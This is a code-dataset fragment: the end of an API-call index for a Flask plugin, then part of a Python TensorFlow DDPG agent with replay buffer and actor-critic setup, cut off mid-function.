"flask_login.login_required", "line_number": 66, "usage_type": "name"}, {"api_name": "model.ModelSetting.setting_save", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "argument"}, {"api_name": "model.ModelSetting", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "model.ModelSetting.set", "line_number": 121, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 126, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 126, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_postprocessor", "line_number": 133, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 133, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.download", "line_number": 142, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 145, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 145, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 146, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 151, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 151, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 152, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 155, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.thumbnail", "line_number": 158, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 160, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 160, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 161, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 161, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 162, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 162, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 163, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 164, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 164, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 165, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 168, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.sub", "line_number": 171, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 171, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 172, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 173, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 173, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 174, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 174, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 175, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 175, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 176, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 178, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 178, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 179, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 179, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 180, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 183, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 187, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 187, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_data", "line_number": 188, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 188, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 191, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 194, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 194, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 199, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 199, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 200, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 200, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 201, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 204, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 215, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 215, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 215, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 228, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 228, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 230, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 230, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_info_dict", "line_number": 231, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 231, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 231, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 231, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 233, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 233, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 239, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 240, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 240, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 241, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 241, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 241, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 241, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 241, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 242, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 242, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 242, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 242, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 243, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 244, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 244, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 245, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 246, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 246, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 250, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 250, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 251, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 251, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 251, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 257, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 257, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 259, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 259, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 261, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 261, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 263, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 263, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.download", "line_number": 264, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 264, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 267, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 267, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 276, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 276, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 277, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 277, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 281, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 281, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 290, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 290, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 291, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 291, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 291, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 292, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 292, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 292, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 292, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 293, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 293, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 293, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 293, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 293, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 294, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 294, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 294, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 295, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 295, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 296, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 296, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 296, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 297, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 297, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 297, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 298, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 298, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 298, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 299, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 299, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 305, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 305, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 307, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 307, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 309, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 309, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.thumbnail", "line_number": 310, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 310, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 313, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 313, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 319, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 319, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 320, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 320, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 324, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 324, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 329, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 333, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 333, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 333, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 334, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 334, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 334, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 335, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 335, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 335, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 335, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 335, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 336, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 336, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 336, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 336, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 336, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 337, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 337, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 337, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 338, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 338, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 338, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 339, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 339, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 340, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 340, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 340, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 341, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 341, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 341, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 342, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 342, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 342, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 343, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 343, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 344, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 344, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 344, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 350, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 350, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 352, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 352, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 354, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 354, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.sub", "line_number": 355, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 355, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 358, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 358, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 366, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 366, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 367, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 367, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 371, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 371, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 376, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 380, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 380, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 380, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 381, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 381, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 381, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 387, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 387, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 389, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 389, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 390, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 390, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 391, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 391, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 393, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 393, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 396, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 396, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 397, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 401, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 401, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 401, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 402, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 402, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 402, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 408, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 408, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 410, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 410, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 411, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 411, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 412, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 412, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 414, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 414, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 417, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 417, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 418, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 422, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 422, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 422, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 423, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 423, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 423, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 434, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 434, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 436, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 436, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 437, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 437, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 438, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 438, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 440, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 440, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 449, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 452, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 453, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 454, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 212, "usage_type": "call"}, {"api_name": "framework.check_api", "line_number": 213, "usage_type": "name"}, {"api_name": "framework.socketio.emit", "line_number": 461, "usage_type": "call"}, {"api_name": "framework.socketio", "line_number": 461, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_data", "line_number": 461, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 461, "usage_type": "name"}]} +{"seq_id": "219639859", "text": "import numpy as np\nimport tensorflow as tf\nimport gym\nimport time\nimport sys\nsys.path.append(\"../\")\ntry:\n from rl_algorithms.ddpg_sp import core\n from rl_algorithms.ddpg_sp.core import get_vars\nexcept Exception as e:\n print(\"ddpg_error:\", e)\n from ddpg_sp import core\n from ddpg_sp.core import get_vars\n\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for TD3 agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs1_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.obs2_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.acts_buf = np.zeros([size, act_dim], dtype=np.float32)\n self.rews_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs1_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n idxs = np.random.randint(0, self.size, size=batch_size)\n return dict(obs1=self.obs1_buf[idxs],\n obs2=self.obs2_buf[idxs],\n acts=self.acts_buf[idxs],\n rews=self.rews_buf[idxs],\n done=self.done_buf[idxs])\n\n\nclass DDPG:\n def __init__(self,\n a_dim, obs_dim, a_bound,\n mlp_actor_critic=core.mlp_actor_critic,\n ac_kwargs=dict(), seed=0,\n\n replay_size=int(1e6), gamma=0.99,\n polyak=0.995, pi_lr=1e-3, q_lr=1e-3,\n batch_size=100, \n act_noise=0.1, target_noise=0.2,\n noise_clip=0.5, policy_delay=2, \n sess_opt=None,\n per_flag=True,\n ):\n self.per_flag = per_flag\n self.learn_step = 0\n\n self.obs_dim = obs_dim\n self.act_dim = a_dim\n self.act_limit = a_bound\n self.policy_delay = policy_delay\n self.action_noise = act_noise\n\n # Share information about action space with policy architecture\n ac_kwargs['action_space'] = a_bound\n\n # Inputs to computation graph\n self.ISWeights = tf.placeholder(tf.float32, [None, 1], name='IS_weights')\n self.actor_lr = tf.placeholder(tf.float32, shape=[], name='actor_lr')\n self.critic_lr = tf.placeholder(tf.float32, shape=[], name='critic_lr')\n self.x_ph, self.a_ph, self.x2_ph, self.r_ph, self.d_ph = core.placeholders(obs_dim, a_dim, obs_dim, None, None)\n\n # Main outputs from computation graph\n with tf.variable_scope('main'):\n self.pi, self.q, q_pi = mlp_actor_critic(self.x_ph, self.a_ph, **ac_kwargs)\n\n # Target networks\n with tf.variable_scope('target'):\n # Note that the action placeholder going to actor_critic here is\n # irrelevant, because we only need q_targ(s, pi_targ(s)).\n pi_targ, _, q_pi_targ = mlp_actor_critic(self.x2_ph, self.a_ph, **ac_kwargs)\n\n # Experience buffer\n if self.per_flag:\n try:\n from rl_algorithms.memory.sp_per_memory import ReplayBuffer\n except:\n from memory.sp_per_memory import ReplayBuffer\n else:\n try:\n from rl_algorithms.memory.sp_memory import ReplayBuffer\n except:\n from memory.sp_memory import ReplayBuffer\n self.replay_buffer = ReplayBuffer(obs_dim=obs_dim,\n act_dim=self.act_dim,\n size=replay_size)\n\n # Count variables\n var_counts = tuple(core.count_vars(scope) for scope in ['main/pi', 'main/q', 'main'])\n print('\\nNumber of parameters: \\t pi: %d, \\t q: %d, \\t total: %d\\n' % var_counts)\n\n # Bellman backup for Q function\n backup = tf.stop_gradient(self.r_ph + gamma * (1 - self.d_ph) * q_pi_targ)\n\n # DDPG losses\n self.pi_loss = -tf.reduce_mean(q_pi)\n\n if self.per_flag:\n # q_target - q\n self.abs_errors = tf.abs(backup - self.q)\n self.q_loss = self.ISWeights * tf.reduce_mean((self.q - backup) ** 2)\n else:\n # 正常的!\n self.q_loss = tf.reduce_mean((self.q - backup) ** 2)\n\n # Separate train ops for pi, q\n pi_optimizer = tf.train.AdamOptimizer(learning_rate=self.actor_lr)\n q_optimizer = tf.train.AdamOptimizer(learning_rate=self.critic_lr)\n self.train_pi_op = pi_optimizer.minimize(self.pi_loss, var_list=get_vars('main/pi'))\n self.train_q_op = q_optimizer.minimize(self.q_loss, var_list=get_vars('main/q'))\n\n # Polyak averaging for target variables\n self.target_update = tf.group([tf.assign(v_targ, polyak * v_targ + (1 - polyak) * v_main)\n for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n # Initializing targets to match main variables\n target_init = tf.group([tf.assign(v_targ, v_main)\n for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n if sess_opt:\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=sess_opt)\n self.sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n else:\n self.sess = tf.Session()\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(target_init)\n\n def get_action(self, s, noise_scale=0):\n if not noise_scale:\n noise_scale = self.action_noise\n a = self.sess.run(self.pi, feed_dict={self.x_ph: s.reshape(1, -1)})[0]\n a += noise_scale * np.random.randn(self.act_dim)\n return np.clip(a, -self.act_limit, self.act_limit)\n\n def store_transition(self, transition):\n if self.per_flag:\n self.replay_buffer.store(transition)\n else:\n (s, a, r, s_, done) = transition\n self.replay_buffer.store(s, a, r, s_, done) \n\n def test_agent(self, env, max_ep_len=1000, 